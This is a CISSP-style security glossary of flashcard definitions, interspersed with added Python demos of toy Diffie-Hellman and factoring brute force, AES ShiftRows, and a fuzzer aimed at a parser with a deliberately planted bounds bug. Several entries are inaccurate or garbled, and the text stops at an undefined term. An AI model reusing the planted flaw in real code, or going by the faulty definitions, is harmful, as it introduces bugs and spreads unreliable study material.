For ensuring that the business will continue to operate before, throughout, and after a disaster event is experienced.

Shareware

Fully functional proprietary software that may be initially used free of charge

IPv4

Internet Protocol version 4 is the fundamental protocol of the Internet. IPv4 was used for the ARPANET. A simple protocol designed to carry data across networks, with 32-bit addresses.

IDS

Intrusion Detection System. Detective device designed to detect malicious (including policy-violating) actions

IPS

Intrusion Prevention System. A preventive device designed to prevent malicious actions.

Vernam Cipher

Invented by Gilbert Vernam(Employee of AT&T Bell Labs). Used bits that were XORed to plaintext bits.

Active-passive cluster

Involves devices or systems that are already in place, configured, powered on, and ready to begin processing network traffic should a failure occur on the primary system.

Active-active cluster

Involves multiple systems all of which are online and actively processing traffic or data

Partial and Complete Business Interruption

Involves real interruption. Extreme caution should be exercised before attempting an actual interruption test.

Smoke detectors

Ionization and Photoelectric. Dust can trigger leading to false alarms

Free software

Is a controversial term that is defined differently by different groups.

Kerberos Steps

Kerberos Principal Alice contacts the KDC The KDC sends Alice a session key, encrypted with Alice's secret key. The KDC also sends a TGT (Ticket Granting Ticket), encrypted with the TGS's secret key Alice decrypts the session key and uses it to request permission to print from the TGS (Ticket Granting Service). Seeing Alice has a valid session key (and therefore has proven her identity claim), the TGS sends Alice a C/S session key (second session key) to use to print. The TGS also sends a service ticket, encrypted with the printer's key. Alice connects to the printer. The printer, seeing a valid C/S session key, knows Alice has permission to print, and also knows that Alice is authentic. ***KDC and TGS are separate services.***

Kerberos FAQ

Kerberos is a network authentication system for use on physically insecure networks, based on the key distribution model presented by Needham and Schroeder. It allows entities communicating over networks to prove their identity to each other while preventing eavesdropping or replay attacks. It also provides for data stream integrity (detection of modification) and secrecy (preventing unauthorized reading) using cryptography systems such as DES (Data Encryption Standard)."

Key Clustering

Key Clustering occurs when two symmetric keys applied to the same plaintext produce the same ciphertext

Diffie-Hellman Key Agreement Protocol

Key agreement allows two parties to securely agree on a symmetric key via a public channel, such as the Internet, with no prior key exchange

Key locks

Key locks require a physical key to unlock. Many keys are stamped with the bitting code (e.g., 74226), one digit per pin position on a 0-9 scale (0 shallow, 9 quite deep); a photo of the key is enough to duplicate it.

Expert Systems

Knowledge Base and Inference Engine

Rijndael

Selected as AES. Judged the best combination of security, performance, efficiency, and flexibility among the finalists.

Costliness of DRP Testing

LEAST • DRP Review •ReadThrough/Checklist/Consistency • Structured Walkthrough/Tabletop • Simulation Test/Walkthrough Drill • Parallel Processing • Partial Interruption • Complete Business Interruption MOST

Wiring closets

Lack of security around wiring closets presents a physical access issue.

Progressive Discipline

Ladder of Discipline. Coaching. Formal Discussion. Verbal warning meeting, with Human Resources attendance. Written warning meeting, with Human Resources attendance (perhaps multiple warnings). Termination

Microsoft LM

LanMan passwords are converted to upper case before hashing, and therefore case sensitivity is irrelevant)

Bridges

Layer 2 device with two ports that connects network segments together. Learns the MAC addresses of nodes on either side and forwards only the traffic that needs to cross, providing traffic isolation: each side is its own collision domain (2 collision domains).

Application Layer Proxy Firewalls

Makes decisions based on Application Layer Data(e.g. HTTP Traffic). Must understand the protocol that Is proxied (often dedicated)

Virtualization Issues

Multiple hosts on one system raises security concerns.

SDLC 9

Operations and Maintenance

Discrete Logarithm

The inverse of exponentiation. Computing 7 to the 13th power (exponentiation) is easy on a modern calculator: 96,889,010,407. Asking "96,889,010,407 is 7 to what power?" is the logarithm; in modular arithmetic with large numbers this reverse question is computationally infeasible.

Diffusion

Order of plaintext should be diffused in the ciphertext.

Data Collection Limitation

Organization should collect the minimum amount of sensitive information that is required. There should be limits to the collection of personal data.

Key Storage

The organization that issues the public/private key pairs retains a copy.

OFDM

Orthogonal Frequency-Division Multiplexing

Shared Tenancy

Other tenants pose a risk because they are already behind perimeter. Adjacent buildings also pose a risk. British Bank of the Middle East(1976...Hole in Church)

OFB

Output Feedback. Differs from CFB in how feedback is accomplished: OFB feeds back the cipher's output (the keystream block), whereas CFB feeds back the previous ciphertext block, so in OFB a transmission error does not propagate. **STREAM** mode.

Halon

Ozone depleting properties. Chemical reaction that consumes energy and lowers the temperature of the fire. See Montreal Protocol.

PDA

PDAs should use secure wireless connections

SPF10

PDU's; Segments, Packets, Frames, Ones and Zeroes

PCI-DSS

Payment Card Industry Data Security Standards. Industry Specific. Created by PCI-SSC. Standards seek to protect credit cards by requiring vendors using them to take specific security precautions. It is a multi-faceted security standard that includes requirements for security management. Protecting customer data.

Arithmetic Logic Unit(ALU)

Performs mathematical calculations. It computes. It is fed instructions by the control unit which acts as traffic cop

PII

Personally Identifiable Information

Conflicts Of Interest(CoIs)

Pertain to accessing sensitive information from different companies that are in direct competition with one another. E.g., the Chinese Wall (Brewer-Nash) model requires that CoIs be identified so that once a consultant gains access to one company's data within a CoI class, access to its competitors' data in that class is denied.

Crosstalk

Poorly shielded or too close cable impacts a separate conversation.

PAT

Port Address Translation. typically makes a many-to-one translation from multiple private addresses to one public IP address. Solution for homes and small offices.

PGP

Pretty Good Privacy brought Asymmetric Encryption to the masses(1991). Users could communicate without sharing a key. Provides confidentiality, integrity, authentication, and nonrepudiation. Used to encrypt emails, documents, or disk drives. Web of Trust Model, Trust me, Trust everyone that I trust

Controlling Access

Preventing unauthorized access.

Access Control Types(6)

Preventive Detective Corrective Recovery Deterrent Compensating

Locks

Preventive physical security control.

Memory Protection

Prevents one process from affecting the confidentiality, integrity, or availability of another.

Computer Bus

Primary communication channel on a computer system. Communication between CPU, Memory, I/O Devices occur via the bus.

Microsoft Windows Active Directory

Primary means to control access. Uses Kerberos. Has been integrated into Microsoft Windows operating systems since Windows 2000

Factoring prime numbers

Prime Number: divisible by 1 and itself Composite Number: Evenly divisible by numbers other than 1 and itself. Eg: "which prime number times which prime number equals 49,418,527" is much more difficult
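
The one-way functions behind the Diffie-Hellman, discrete-logarithm and factoring cards above, as an added example that is not part of the study set. The forward direction (exponentiation) is one call; the reverse is brute force here and only finishes because the parameters are toy-sized. 7^13, the composite 49,418,527 and the idea of a public channel are from the cards; the prime 65537 with generator 3 and the private exponents are constructed for the demo.

```python
"""Added example (not from the study set): fast forward direction, slow
reverse direction, for the hard problems behind DH and RSA. Parameters are
toy-sized on purpose so the brute-force attacks actually finish."""
from math import isqrt
from typing import Optional, Tuple


def integer_log(base: int, target: int) -> Optional[int]:
    """'96,889,010,407 is 7 to what power?' over the plain integers."""
    power, exp = 1, 0
    while power < target:
        power, exp = power * base, exp + 1
    return exp if power == target else None


def discrete_log(g: int, h: int, p: int) -> Optional[int]:
    """Smallest x with g^x = h (mod p), by exhaustive search: O(p) work,
    which is why real groups use primes of 2048 bits or more."""
    acc = 1
    for x in range(p - 1):
        if acc == h:
            return x
        acc = acc * g % p
    return None


def dh_agree(p: int, g: int, a: int, b: int) -> Tuple[int, int, int, int]:
    """Diffie-Hellman: only A and B cross the channel; both sides derive the
    same shared secret without ever transmitting it. Returns (A, B, sa, sb)."""
    A, B = pow(g, a, p), pow(g, b, p)
    return A, B, pow(B, a, p), pow(A, b, p)


def eavesdropper(p: int, g: int, A: int, B: int) -> int:
    """Passive attacker with only the public values: solve the discrete log of
    A to recover a, then compute the secret exactly as Alice does."""
    a = discrete_log(g, A, p)
    return pow(B, a, p)


def factor_semiprime(n: int) -> Tuple[int, int]:
    """Trial division up to sqrt(n): fine for 8 digits, hopeless for 600."""
    if n % 2 == 0:
        return 2, n // 2
    for d in range(3, isqrt(n) + 1, 2):
        if n % d == 0:
            return d, n // d
    raise ValueError(f"{n} is prime")


if __name__ == "__main__":
    print(integer_log(7, 96889010407))                 # 13
    A, B, sa, sb = dh_agree(65537, 3, 12345, 54321)
    print(sa == sb, eavesdropper(65537, 3, A, B) == sa)
    print(factor_semiprime(49418527))                  # the card's question
```

The point of the sizes: with p = 65537 the eavesdropper needs at most 65536 multiplications; with a 2048-bit prime the same loop would not finish before the heat death of the universe, and no known algorithm does dramatically better on classical hardware.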

RFC 1918 addresses

Private IPv4 addresses that may be used for internal traffic 10.0.0.0 - 10.255.255.255/8 172.16.0.0 - 172.31.255.255/12 192.168.0.0 - 192.168.255.255/16

UPSs

Protect against electric failures. Backup power is provided via batteries or fuel cells.

Surge Protectors,

Protect against electric failures. Circuit or fuse that is tripped during a power spike or surge

Canons(1)

Protect society, the commonwealth, and the infrastructure.

PEAP

Protected EAP; Cisco Systems, Microsoft, and RSA Security, is similar to (and may be considered a competitor to) EAP-TTLS. Doesn't require client-side certificates.

Data Execution Prevention

Protection against memory corruption. Ensures that memory locations not pre-defined to contain executable content will not have the ability to have code executed. Prevents shell code execution

Link State Routing Protocols

Protocol factors in additional metrics for determining the best route, including bandwidth.

Virtual Memory

Provides virtual addresses that sit between applications and physical memory. ***Allows swapping***

Canons(3)

Provide diligent and competent service to principals.

Ten Commandments of Computer Ethics

Provided by the Computer Ethics Institute as code for information security professionals to abide by.

Network Tap

Provides a way to tap into network traffic and see all traffic(including all unicast) Taps are the preferred way for access to sniffer or NIDS

Authentication Header(AH)

Provides authentication and integrity for each packet of the network data. Acts as a digital signature for The data. Protects against replay attacks.

Secure Real-time Transport Protocol

Provides confidentiality, integrity, and secure authentication for RTP media streams. VoIP traffic sent via insecure networks should be secured via SRTP.

ShiftRows

Provides diffusion by shifting rows Row 0 is unchanged Row 1 is shifted 1 left Row 2 is shifted 2 left Row 3 is shifted 3 left
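
ShiftRows as described above, as an added example that is not part of the study set. It lays the 16-byte block out column-major as in FIPS 197 (byte i sits at row i mod 4, column i div 4), applies the row rotations, inverts them, and checks the diffusion claim by tracking which columns the bytes of one input column end up in. The input block is constructed.

```python
"""Added example (not from the study set): AES ShiftRows and InvShiftRows on
the 4x4 byte state, column-major as in FIPS 197. Input is constructed."""
from typing import List

State = List[List[int]]  # state[row][col]


def to_state(block: bytes) -> State:
    if len(block) != 16:
        raise ValueError("AES state is exactly 16 bytes")
    return [[block[r + 4 * c] for c in range(4)] for r in range(4)]


def from_state(state: State) -> bytes:
    return bytes(state[r][c] for c in range(4) for r in range(4))


def shift_rows(state: State) -> State:
    """Row r is rotated left by r positions; row 0 is untouched."""
    return [row[r:] + row[:r] for r, row in enumerate(state)]


def inv_shift_rows(state: State) -> State:
    """Rotate each row right by r to undo shift_rows."""
    return [row[-r:] + row[:-r] if r else row[:] for r, row in enumerate(state)]


def shift_rows_block(block: bytes) -> bytes:
    return from_state(shift_rows(to_state(block)))


def inv_shift_rows_block(block: bytes) -> bytes:
    return from_state(inv_shift_rows(to_state(block)))


def columns_reached(col: int) -> set:
    """Diffusion check: mark the four bytes of input column 'col' and see
    which output columns they land in after ShiftRows."""
    marker = bytes(1 if i // 4 == col else 0 for i in range(16))
    out = shift_rows_block(marker)
    return {i // 4 for i, v in enumerate(out) if v}


if __name__ == "__main__":
    blk = bytes(range(16))
    print(shift_rows_block(blk).hex())
    print(columns_reached(0))
```

ShiftRows alone is a permutation and provides no confusion; it is the pairing with MixColumns on the next step that lets a single changed input byte influence the whole state after two rounds.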

Custodian

Provides hands-on protection of assets such as data. Follow detailed orders.

Tailoring Process: 6

Providing additional specification information for control implementation, if needed. Tailoring process involves "parameters" including; password complexity policies

Fire Suppression

Reduce Temperature Reduce Oxygen Supply Reduce Fuel Supply Interfere Reaction

RISC

Reduced Instruction Set Computer. Uses a reduced set of simpler instructions.

Register Direct Addressing

The operand is held in a CPU register, which the instruction references directly.

Internet of Things (IOT)

Refers to a small Internet of connected devices: smart meters, baby monitors, cash registers, cars, fitness monitors. All such things are directly accessible via the Internet, and so directly attackable.

Covert Timing Channel

Relies on system clock to infer sensitive information

Remediation

Remediation steps occur during the mitigation phase, where vulnerabilities within the impacted system or systems are mitigated.

RADIUS

Remote Authentication Dial In User Service, a third-party authentication system. Uses UDP ports 1812 (authentication) and 1813 (accounting); legacy implementations used 1645 and 1646. Provides authentication, authorization, and accounting (AAA).

Overwriting

Results are poor. It is not a universally reliable method of sanitization.

RARP

Reverse ARP. used by diskless workstations to determine its IP address. "Who am I? Tell me."

SSL

Secure Socket Layer designed to protect HTTP (Hypertext Transfer Protocol) data: HTTPS uses TCP port 443. May be used to encrypt many types of data. SSL client software does not require altering the operating system

SAML

Security Assertion Markup Language. XML-based framework for exchanging authentication and authorization information (assertions) between parties, widely used for web single sign-on.

NIST SDLC Step 13

Security Operations and Administration: Examples include backups, training, managing cryptographic keys, user administration, and patching.

NIST SDLC Step 10

Security Testing: Used to certify a system; may include testing security management, physical facilities, personnel, procedures, the use of commercial or in-house services (such as networking services), and contingency planning.

NIST Special Publication 800-53

Security and Privacy Controls for Federal Information Systems and Organizations

Mobile Device Attacks

Security challenges posed by portable devices ranging from USB flash drives to laptops.

NIST Special Publication 800-14

Security, like other aspects of an IT system, is best managed if planned for throughout the IT system life cycle. There are many models for the IT system life cycle but most contain five basic phases: initiation, development/acquisition, implementation, operation, and disposal."

IAB Practice 1

Seeks to gain unauthorized access to the resources of the internet

Confidentiality

Seeks to prevent the unauthorized disclosure of information: it keeps data secret

Tailoring Process: 3

Selecting compensating security controls, if needed;

Half Duplex

Send or receive at one time only (Walkie Talkie)

RSA

Used to send an AES (symmetric) key, called a session key, protected by RSA (asymmetric) encryption. A new session key may be generated and transmitted via RSA for each session. This hybrid approach leverages the strengths of both cryptosystems.

Backups

Sensitive backup data should be stored offsite, whether transmitted offsite via networks, or physically moved as backup media. Ensure backup sites are unlikely to be impacted by the same disaster that may strike the primary site.

Software Defined Networking

Separates a router's control plane from the data. Data plane forwards data (packets) through the router

Layering

Separates hardware and software functionality into modular tiers

Flat file

Simplest form of a database

SSO Advantages

Simplified administration, Improved user productivity, Improved developer productivity.

SSO

Single Sign-On is where a subject may authenticate once, and then access multiple systems

Tuple

A row (record) in a relational database table; a single cell is an attribute value.

"Point. Click. Root"

Slogan illustrates the fact that script kiddie tools such as the Metasploit Framework are of high quality and can achieve impressive results.

Pre-Action

Systems are a combination of wet, dry, or deluge systems, and require two separate triggers to release water

T Carriers

A T1 is a dedicated 1.544 Mbps circuit. A T3 is 28 bundled T1s (44.736 Mbps, commonly rounded to 45 Mbps).

TACACS+

TACACS+ provides better password protection by allowing two-factor strong authentication, and encrypts the whole packet body (RADIUS encrypts only the password). Uses TCP port 49 for communication with the TACACS+ server.

IRC server

TCP port 6667 by default. Used by malware, which may "phone home" to a command-and-control channel via IRC. Chat software may be subject to various security issues, including remote exploitation, and must be patched like any other software

***Note***

TCP and UDP are Layer 4 (Transport). ICMP is carried directly inside IP and is commonly classified at Layer 3 (Network), although some texts group it with the Layer 4 protocols.

BCP/DRP Reminder

These are the final controls. If these fail, the business can fail. "Have we made mistakes that threaten the success of our plan?"

Transport Mode

Transport Mode only encrypts the data (and not the original headers); AH is often used along with ESP in transport mode.

TDES

Triple Data Encryption Standard: public algorithm that stood the test of time, but is slow and now deprecated (NIST disallows it for new encryption after 2023); use AES.

4 Types of events

True Positive, True Negative, False Positive, and False Negative.

TCSEC(AKA "The Orange Book")

Trusted Computer System Evaluation Criteria. One of the first security standards implemented: criteria and an evaluation method for choosing security products, later superseded by ITSEC and then the Common Criteria. Divisions: D: Minimal Protection C: Discretionary Protection B: Mandatory Protection A: Verified Protection.

TNI/Red Book

Trusted Network Interpretation (TNI) brings TCSEC concepts to network systems. It is often called the "Red Book," due to the color of its cover. *TCSEC itself does not address network issues.

Tunnel Mode

Tunnel mode provides confidentiality (ESP) and/or authentication (AH) to the entire original packet. Both modes add extra IPsec headers

Fuzzing

Type of black box testing that submits random, malformed data as inputs into software programs to determine if they will crash. Random input strings, command line inputs, environment variables. Any program that crashes has failed the fuzz test.
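
A minimal fuzzer in the sense described above, as an added example that is not part of the study set. The target is a constructed toy record parser with a planted bounds bug; the fuzzer mutates a valid seed (bit flips, truncation, insertion, random garbage), feeds each case to the parser, and records any crash that is not one of the parser's documented errors. The seeded RNG makes the run reproducible.

```python
"""Added example (not from the study set): a mutation fuzzer against a
constructed toy parser. Any exception other than the parser's documented
ValueError counts as a crash, i.e. a failed fuzz test."""
import random
from typing import Callable, List, Tuple


def encode_record(payload: bytes) -> bytes:
    """Toy wire format: [1-byte length][payload][1-byte checksum]."""
    return bytes([len(payload)]) + payload + bytes([sum(payload) & 0xFF])


def parse_records(data: bytes) -> List[bytes]:
    """Documented failure mode: ValueError on malformed input. Planted bug:
    the checksum byte is read without checking that it exists, so a record
    cut off right after its payload raises IndexError (the 'crash')."""
    out, i = [], 0
    while i < len(data):
        n = data[i]
        payload = data[i + 1:i + 1 + n]
        if len(payload) != n:
            raise ValueError("truncated payload")
        checksum = data[i + 1 + n]          # <- missing bounds check
        if checksum != sum(payload) & 0xFF:
            raise ValueError("bad checksum")
        out.append(payload)
        i += 2 + n
    return out


def mutate(rng: random.Random, seed: bytes) -> bytes:
    """Bit flip, truncate, insert a byte, or replace with random garbage."""
    data = bytearray(seed)
    op = rng.randrange(4)
    if op == 0 and data:
        data[rng.randrange(len(data))] ^= 1 << rng.randrange(8)
    elif op == 1:
        data = data[:rng.randrange(len(data) + 1)]
    elif op == 2:
        data.insert(rng.randrange(len(data) + 1), rng.randrange(256))
    else:
        data = bytearray(rng.randrange(256) for _ in range(rng.randrange(1, 16)))
    return bytes(data)


def fuzz(target: Callable[[bytes], object], seed: bytes, iterations: int = 500,
         rng_seed: int = 1, expected=(ValueError,)) -> List[Tuple[bytes, str]]:
    """Return (input, exception name) for every crash that is not an expected,
    cleanly reported error."""
    rng = random.Random(rng_seed)
    crashes = []
    for _ in range(iterations):
        case = mutate(rng, seed)
        try:
            target(case)
        except expected:
            pass                              # malformed input rejected cleanly
        except Exception as exc:              # anything else is a fuzz failure
            crashes.append((case, type(exc).__name__))
    return crashes


SEED = encode_record(b"abc") + encode_record(b"")  # constructed valid input

if __name__ == "__main__":
    found = fuzz(parse_records, SEED)
    print(len(found), "crashes; first:", found[0] if found else None)
```

Real fuzzers (AFL, libFuzzer) add coverage feedback so mutations that reach new code are kept as seeds, but the contract is the same as here: the program may reject input, it may not crash on it.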

Software Testing Levels

Unit Testing, Installation Testing, Integration Testing, Regression Testing, and Acceptance Testing

UTP

Unshielded Twisted Pair; susceptible to EMI and crosstalk

Fiber Optic Cables

Use light instead of electricity to Transmit Data

Digital Watermarks

Used for fingerprinting data, images.

Trunks

Used to connect multiple switches.

Digital Signatures

Used to cryptographically sign documents. Provide nonrepudiation, including authentication of the identity and integrity of the data. ***Does not provide confidentiality***

Port Isolation

Used to ensure that individual systems cannot interact with other resources even if logically on the same subnet.

Couriers

Used to transfer media to and from offsite storage facility

Distance Vector Routing Protocols

Uses metrics to determine best route. i.e. hop count. Prone to routing loops where packets loop between two routers.

Covert Storage Channel

Uses shared storage, such as a temporary directory, to allow subjects to signal each other.

Encryption Keys in RAM

Usually exist in plaintext in RAM. May be recovered by "cold booting" the computer from a small OS on removable media and dumping memory before its contents decay (cold boot attack).

TCSEC Division A

Verified Protection, with a single class A1 (Verified Design). A1 contains everything class B3, plus additional controls.

Database Views

Views may be used to provide a constrained user interface

VLAN

Virtual LAN. Logically segments one physical switch into multiple broadcast domains (or spans one LAN across several switches); ports in different VLANs cannot communicate without a router.

Boot sector virus

Virus that infects the boot sector of a PC. Loads upon system start

EAP-MD5

Weak form of EAP. It offers client → server authentication only. EAP-MD5 is also vulnerable to password cracking attacks

RAM & Virtual Memory

When RAM is full or nearly full, the system swaps processes out to virtual memory (disk). It searches for idle processes to swap first so the performance impact is minimal.

Entrapment

When law enforcement persuades someone to commit a crime that the person otherwise had no intention of committing.

Storing Sensitive Information

When storing sensitive information, encrypt it. Encryption of data at rest ensures confidentiality. Chain of custody (physical security controls) is important to consider during transfer.

Kernel Mode(Supervisor Mode)

Where the kernel is. Allows low-level access to memory, CPU, disk, etc. Most trusted and powerful part of a system.

Layer 7 - Application

Where you interface with your computer application. Your Web browser, word processor, and instant messaging client exist

Polyinstantiation

allows two different objects to have the same. Database polyinstantiation means two rows have the same primary key, but different data.

WRT

Work Recovery Time describes the time required to configure a recovered system

Call Tree

Workaround to congestion on phone lines during a disaster.

Right to Audit

Written approval on behalf of the organization being audited to allow the third party to commence the audit.

Macrovirus

Written in a macro language (Microsoft Office, Excel)

Honeynets

a (real or simulated) network of honeypots. Honeynets involve an entire network of systems and services that lack any legitimate devices

DLP

a class of solutions that are tasked specifically with trying to detect or, preferably, prevent data from leaving an organization in an unauthorized manner.

Solid State Drives

a combination of flash memory and DRAM. Degaussing has no effect. SSDs have logical blocks that are mapped to physical blocks

Password Control

a concern for management as well as the IT security professional. Written down, etc.

Key Escrow

a copy of the key is retained by the third-party organization(sometimes multiple...)

Cipher

a cryptographic algorithm

Integrated Product Team

a customer-focused group that focuses on the entire lifecycle of a project

Systems Development Life Cycle

a development model that focuses on security in every phase

Authenticator

a device such as an access point that allows a supplicant to authenticate and connect

Programmable Logic Device (PLD)

a field-programmable device, which means it is programmed after it leaves the factory. EPROMS, EEPROMS, and Flash Memory are all examples.

Acceptance Testing(ISTQB)

"a formal testing with respect to user needs, requirements, and business processes conducted to determine whether or not a system satisfies the acceptance criteria and to enable the user, customers or other authorized entity to determine whether or not to accept the system."

Internet

a global collection of peered networks running TCP/IP, providing best effort service

Message Authentication Code(MAC)

a hash function that uses a key. A common MAC implementation is Cipher Block Chaining Message Authentication Code(CBC-MAC) eg: uses DES

Policy

a high-level management directive. Policy is mandatory. It does not delve into specifics. i.e. A company's sexual harassment policy.

Foreign Key

a key in a related database that matches a primary key in a parent database table.

Hot site

a location that an organization may relocate to following a major disruption or disaster. It is a datacenter with a raised floor, power, utilities, computer peripherals, and fully configured computers.

Assembly language

a low-level computer programming language. "SUB", "ADD", "JMP"

Aggregation

a mathematical attack where an attacker aggregates details at a lower classification to determine information at a higher classification

State Machine Model

a mathematical model that groups all possible system occurrences, called states. 'States' are evaluated and overall systems are proven to be secure upon close of evaluation.

Aggregation

a mathematical process: a user asks every question, receives every answer, and derives restricted information.

Dumpster Diving

a physical attack in which a person recovers trash in hopes of finding sensitive information.

Topography

the physical shape of the land: hills, valleys, trees, etc. Highly secure sites will leverage topography, e.g. military sites.

Continuity of Operations Plan

a plan to maintain operations during a disaster.

Tuple

a row (entry) in a relational database table.

Disaster Recovery Plan

a short-term plan to recover from a disruptive event

Backdoor

a shortcut in a system that allows a user to bypass security checks.(skipping username/password authentication.)

Bayesian Filtering

a simple mathematical formula used for calculating conditional probabilities. Modern application to identify spam

Spiral Model

a software development model designed to control risk

Database

a structured collection of related data. Databases allow queries (searches), insertions (updates), deletions, and many other functions.

Honeypots

a system designed to attract attackers. Internal honeypots can provide high-value warnings of internal malware or attackers. Consult with legal staff before deploying a honeypot

Polymorphic virus

a virus that changes its signature upon infection of a new system, attempting to evade signature based antivirus software

Vulnerability

a weakness in a system

NDA

a work-related contractual agreement that ensures that, prior to being given access to sensitive information or data, an individual or organization appreciates their legal responsibility to maintain the confidentiality of that sensitive information.

Authorization

actions authenticated subjects are allowed to perform on a system

MAC Address

the unique hardware address of an Ethernet network interface card (NIC), typically "burned in". 48-bit or 64-bit (EUI-64)

Privilege escalation

allow an attacker with (typically limited) access to be able to access additional resources

Network Model(People)

allows branches of a hierarchical database to have two parents. Ex: Organization's hierarchy.

European Union(EU) Privacy Directive

allows for the free flow of information while still maintaining consistent protection of each member nation's citizens' data

DHCP

allows more configuration options, as well as assigning temporary IP address leases to systems

Salt

allows one password to hash multiple ways. Some systems (like modern UNIX/Linux systems) combine a salt with a password before hashing

Data Analytics

allows an organization to better understand the typical use cases and a baseline of what constitutes typical or normal interaction with the database.

Lattice-Based Access Controls

allows security controls for complex environments. There are defined upper and lower access limits implemented by the system. Allows reaching of higher and lower data classifications, depending on the needs of the customer. Subjects have a Least Upper Bound and a Greatest Lower Bound

Pivot

allows the attacker to establish a foothold 'behind enemy lines' (behind the firewall) and surf to internal websites, etc. Horizontal escalation is a form of pivoting. Non-privileged user to another Non-privileged.

Gateway-to-gateway(IPsec)

(also called point-to-point) connects two IPsec gateways

The Operational Acceptance test

also known as Production acceptance test validates whether the system meets the requirements for operation.

Due Diligence

always meeting or exceeding the requirements for protection of assets. Prudent in the investigation of potential threats.

Extreme Programming(XP)

an Agile development method that uses pairs of programmers who work off a detailed specification

Nonrepudiation

an assurance that a specific user performed a specific transaction. The user cannot repudiate (deny) it.

Password guessing

an online technique that involves attempting to authenticate a particular user to the system

Common Object Request Broker Architecture

an open vendor-neutral networked object broker framework by the Object Management Group. Competes with Microsoft DCOM.

End User License Agreements(EULA's)

an unusual form of contract because using software typically constitutes contractual agreement.

Subject

an active entity on an information system

Covert channel

any communication that violates a security policy. Used by malware installed on a system that locates.

Disaster

any disruptive event that interrupts normal system operations

Hybrid Attacks

appends, prepends, or changes characters in words from a dictionary before hashing, to attempt the fastest crack of complex passwords. For complex passwords. Example: Replaces each letter "o" with the number "0"

Triple DES

applies single DES encryption three times per block. Formally called "TDEA". Held up well after years of cryptanalysis. Primary weakness is that it is slow. Encrypt, Decrypt, Encrypt. Keying options: 1TDES EDE, 2TDES EDE, and 3TDES EDE (three unique keys).

Reciprocal agreements

are a bi-directional agreement between two organizations in which one organization promises another organization that it can move in and share space if it experiences a disaster.

Maintenance hooks

are a type of backdoor: shortcuts installed by designers and programmers to allow developers to bypass normal system checks during development.

Fourth-generation programming languages (4GL)

are computer languages that are designed to increase programmers' efficiency by automating the creation of computer programming code.

DRP Review

basic form of initial DRP testing, and is focused on simply reading the DRP in its entirety to ensure completeness of coverage.

Respond

begins the process of assessing the damage

Combinatorial software testing

black-box testing method that seeks to identify and test all unique combinations of software inputs

Physical Countermeasures

building, office security, locks, security guards, mobile device encryption.

DHCPv6

called "stateful autoconfiguration"

Corrosion

can be caused by High Humidity Levels

VLAN

can be thought of as a virtual switch. Acts as both a computer switch and a server switch. FF:FF:FF:FF:FF:FF traffic will reach all computers but not servers.

Credential Management Systems

can help harden user credentials in meaningful ways.

Object-Oriented Programming

changes the older procedural programming methodology, and treats a program as a series of connected objects that communicate via messages

Organization for Economic Cooperation and Development (OECD)

consists of 30 member nations from around the world. Provide a basic framework for the protections that should be afforded of personal data.

Botnet

contains a central command and control network, managed by humans called bot herders. Term zombie is used to describe a bot. Many use IRC

Take-Grant Protection Model

contains rules that govern the interactions between subjects and objects, and the permissions subjects can grant to other subjects. Rules include: take, grant, create, and remove

Hypervisor

controls access between virtual guests and the host. A Type 1 hypervisor (bare metal) is part of an operating system that runs directly on the host hardware, e.g. VMware ESX. A Type 2 hypervisor runs as an application on a normal operating system.

Encryption

converts plaintext to ciphertext

Data Controllers

create and manage sensitive data within an organization. HR employees are often data controllers.

Genetic programming

creates random programs and assigns them a task of solving a problem. The fitness function describes how well they perform their task

Utility Reliability

critical for site selection. Protecting against outages and failures is key.

Digital forensics

dealing with investigations and evidence with special consideration of the legal aspects of this process

Standards

describe the specific use of technology. Often applied to hardware. Standards are mandatory. They lower the Total Cost of Ownership(TCO)

Work Factor

describes how long it will take to break a cryptosystem.

Mean Time to Repair

describes how long it will take to recover a failed system

Throughput

describes the process of authenticating to a biometric system. A typical throughput is 6-10 seconds

Layer 1 - Physical

describes units of data such as bits represented by energy

Scope(Policy)

describes what systems, people, facilities, and organizations are covered by the policy.

Network Model

description of how a network protocol suite operates. OSI Model

Chinese Wall Model

designed to avoid conflicts of interest by prohibiting one person, such as a consultant, from accessing multiple conflict of interest categories (CoIs)

Analog

designed to carry the human voice. A vinyl record is analog

Diameter

designed to provide an improved Authentication, Authorization, and Accounting (AAA) framework. Diameter uses a single server to manage policies for many services, as opposed to RADIUS, which requires many servers to handle all of the secure connections

Duress Warning Systems

designed to provide immediate alerts to personnel in the event of emergencies. violence, weather, chemical contamination. i.e. Speaker Systems

Destruction

destructive methods include: incineration, pulverizing, shredding, and bathing metal components in acid.

BRP

details the steps required to restore normal business operations after recovering from a disruptive event

Closed Circuit Television (CCTV)

detective device used to aid guards in detecting the presence of intruders in restricted areas. Key issues include depth of field (the area that is in focus) and field of view (the entire area viewed by the camera). Pan and tilt. Backed up by magnetic tape

Least Privilege

dictates that persons have no more than the access that is strictly required for the performance of their duties. Least Privilege is a form of Discretionary Access Control (DAC)

Static

discharges to balance a positive and negative electrical imbalance. Can cause damage to systems. Mitigated by proper humidity

Confidential

disclosure could cause damage to national security.

Top Secret

disclosure could cause exceptionally grave damage to national security.

Secret

disclosure could cause serious damage to national security.

Communicate

disseminating details regarding the organization's recovery status

Formal Access Approval

documented approval from the data owner for a subject to access certain objects. Requires that the subject understands all rules regarding access and the consequences should data become lost, destroyed, or compromised

Erase Operation

does not overwrite blocks. Data is written to flash on a page level and a page must be completely erased before it can be written to again.

Due Care

doing what a reasonable person would do. The "prudent man" rule. e.g. Parents have a duty to care for their children. Due diligence is the management of due care.

Asymmetric Encryption

encryption that uses two keys: if you encrypt with one you may decrypt with the other.

Full Disk Encryption (FDE)

encrypts an entire disk. This is superior to partially encrypted solutions, such as encrypted volumes, directories, folders or files

Emanations

energy that escapes an electronic system

Asset Tracking

enhances physical security. Asset tracking databases support regulatory compliance by identifying where data is.

Availability

ensure that information is available when needed

Safety Warden

ensures that all personnel safely evacuate the building in the event of an emergency or drill.

Full disk encryption

ensures the confidentiality of mobile device data. Superior to partially encrypted solutions.

Layer 3 - Network

describes routing: moving data from a system on one LAN to a system on another. IP Address

Program Policy

establishes an organization's information security program.

Anomaly Detection

establishing a baseline of normal traffic. Alerting on abnormal network activity. Can detect new attacks

Exigent circumstances

evidence regarding an immediate threat to human life or of evidence being destroyed.

Security Incident

exists if the events suggest that violation of an organization's security posture has or is likely to occur.

Grey hat hackers

fall between the black and white hat hackers. Act without malicious intent. The goal of a grey hat is to improve system and network security.

Static Random Access Memory (SRAM)

fast, expensive memory that uses small latches called "flip flops" to store bits. Maintains integrity as long as power is supplied.

3 Types of Backups

full backup, incremental backup and differential backup.

White box software testing

gives the tester access to program source code, data structures, variables, etc

Black box testing

